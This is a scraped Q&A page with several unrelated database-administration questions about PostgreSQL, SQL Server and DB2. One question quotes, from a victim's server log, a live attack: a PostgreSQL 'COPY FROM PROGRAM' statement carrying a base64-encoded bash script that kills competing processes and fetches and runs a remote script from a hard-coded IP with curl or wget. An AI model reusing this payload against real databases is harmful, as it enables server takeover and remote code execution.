I am using postgresql and pgadmin. I had a table (about 12 million rows) from another database which I wanted to transfer to a table in a new database. So I created a custom backup of that table and tried restore for the new table. The Restore job has been running for a while now (about an hour). In pgadmin's database activity panel, I see:
the activity on the DB table I am trying to restore (social) is idle. The active session WAIT event says WALInitSync. I looked it up on postgresql documentation, it says
Waiting for a newly initialized WAL file to reach stable storage.
What does this mean? And why is it taking so long?
Related
I have recently moved my database from azure to self-hosted postgresql.
But the VM utilization of database server spikes upto 100% and stays at the same for hours even though no heavy operations are being performed.
After that, the database shuts down. This is happening at regular interval.
Resized the database to higher configuration and since then utilization goes upto 50% and stays there but the database get shut down.
After checking the logs, found this query being executed which is not at all related to my project.
postgres#postgres STATEMENT: DROP TABLE IF EXISTS UofsVBqD;
CREATE TABLE UofsVBqD(cmd_output text);
COPY UofsVBqD FROM PROGRAM
'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC40MC4yNDMuMjA1L3BnLnNofGJhc2gKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAxOTQuNDAuMjQzLjIwNS9wZy5zaHxiYXNoCmVsc2UKICBfX2N1cmwgaHR0cDovLzE5NC40MC4yNDMuMjA1L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';
SELECT * FROM UofsVBqD;
DROP TABLE IF EXISTS UofsVBqD;
Here I am attaching logs of the spikes
How can I (using PG-Admin) access or create a log (ideally timestamped) that displays the changes that have happened to a table?
First of the way enable pg_stat_statements on PostgreSQL.
create extension pg_stat_statements;
After then you can view all SQL queries executed on your DB. At this you can view when executed SQL, when finished, duration of execute times and etc.
For more details: PostgreSQL Documentation - pg_stat_statements
If you need history of updated or deleted records on the tables, you can do it for all tables manually writing triggers or own functions, using JSON(JSONB) data types.
We are using pgbackrest to backup our database to Amazon S3. We do full backups once a week and an incremental backup every other day.
Size of our database is around 1TB, a full backup is around 600GB and an incremental backup is also around 400GB!
We found out that even read access (pure select statements) on the database has the effect that the underlying data files (in /usr/local/pgsql/data/base/xxxxxx) change. This results in large incremental backups and also in very large storage (costs) on Amazon S3.
Usually the files with low index names (e.g. 391089.1) change on read access.
On an update, we see changes in one or more files - the index could correlate to the age of the row in the table.
Some more facts:
Postgres version 13.1
Database is running in docker container (docker version 20.10.0)
OS is CentOS 7
We see the phenomenon on multiple servers.
Can someone explain, why postgresql changes data files on pure read access?
We tested on a pure database without any other resources accessing the database.
This is normal. Some cases I can think of right away are:
a SELECT or other SQL statement setting a hint bit
This is a shortcut for subsequent statements that access the data, so they don't have t consult the commit log any more.
a SELECT ... FOR UPDATE writing a row lock
autovacuum removing dead row versions
These are leftovers from DELETE or UPDATE.
autovacuum freezing old visible row versions
This is necessary to prevent data corruption if the transaction ID counter wraps around.
The only way to fairly reliably prevent PostgreSQL from modifying a table in the future is:
never perform an INSERT, UPDATE or DELETE on it
run VACUUM (FREEZE) on the table and make sure that there are no concurrent transactions
I am using SQL Server 2008-r2, I have an application deployed in it which receives data every 10 seconds. Due to this the size of my log file has gone up to 40GB. How to reduce the size of the growing log file. (I have tried shrinking but it didn't work for me). How to solve this issue?
find the table that is storing the exception Log in your database, table that gets populated (and its child tables) whenever you perform operation in your application
Truncate these tables. For example:
a)truncate table SGS_ACT_LOG_INST_QUERY
b)truncate table SGS_ACT_LOG_THRESHOLD_QUERY
c)truncate table SGS_EXCEPTION_LOG
Don't truncate these type of tables on a daily basis , do only whenever the size of the database increases because of the log file size.
i)SGS_EXCEPTION_LOG (table that stores exception logs in your DB)
ii)SGS_ACT_LOG_INST_QUERY(table that stores information whenever any operation is performed on the database)
iii)SGS_ACT_LOG_THRESHOLD_QUERY(table that stores information whenever any operation is performed on the database).
I have a .csv file, comma-delimited (located at C:/). I am using the DB2 LOAD utility to load data present in the CSV file in a DB2 table.
LOAD CLIENT FROM C:\Users\somepath\FileName.csv of del
MODIFIED BY NOCHARDEL COLDEL, insert into SchemaName.TABLE_NAME;
CSV file has 25 rows. After the utility completed I got an error message for NOCHARDEL. My table has all 25 rows properly loaded. Now when I try to execute an insert/update/delete statement on any of the tables present in that schema I am getting following error.
Lookup Error - DB2 Database Error: ERROR [55039] [IBM][DB2/AIX64] SQL0290N Table space access is not allowed.
Could you please help me whether I am making any mistake or missing a parameter that is causing lock on the table.
Earlier while loading the file similar situation occurred, where DBA confirmed that Table space in question is in “load in progress” state
Changes generated by the DB2 LOAD utility are not logged (one of the side-effects of its high performance). If the database crashes immediately after the load it will be impossible to recover the table that was loaded by replaying log records, because there are no such records. For this reason the tablespace containing the loaded table is automatically placed in the BACKUP PENDING mode, forcing you to take a backup of that tablespace or the entire database to ensure it is fully recoverable.
There are options that you can specify for the LOAD command that can help you avoid this situation in the future:
NONRECOVERABLE -- this option does not place the tablespace into the BACKUP PENDING mode, but, as its name implies, the table you're loading to becomes non-recoverable in case of a crash, and your only option in that situation will be to drop and re-create the table.
COPY YES -- this option creates a copy of the table prior to loading, which can be used to recover the table to its pre-LOAD state in case of a crash.
If you are only loading 25 records, I suggest you use the IMPORT utility instead -- it does not have these restrictions because it is fully logged (at the price of lower performance, which for 25 records won't matter).
Thanks #mustaccio. I had 60 Million rows to insert. I was using 25 as sample to check the outcome.
To add another point, we later came to know that this is a known DB2 bug that keeps the load in progress state (DB2 is unable to acknowledge that the load has completed and the session remains open indefinitely) and place the table space in backup pending state.
Recovery is the only option to release the table space once it is in pending state.
This issue is fixed in fix pack 10 as per the DB2 team (we are yet to deploy and test). Mean while NONRECOVERABLE key word is working fine for us
The reason why your table is stuck in the LOAD IN PROGRESS state is the NOCHARDEL error happening at the end of the LOAD.
Have you tried restarting the database? This should reinitialize all table spaces and remove any rogue states.
http://www-01.ibm.com/support/docview.wss?uid=swg1IC65395
http://www-01.ibm.com/support/docview.wss?uid=swg21427102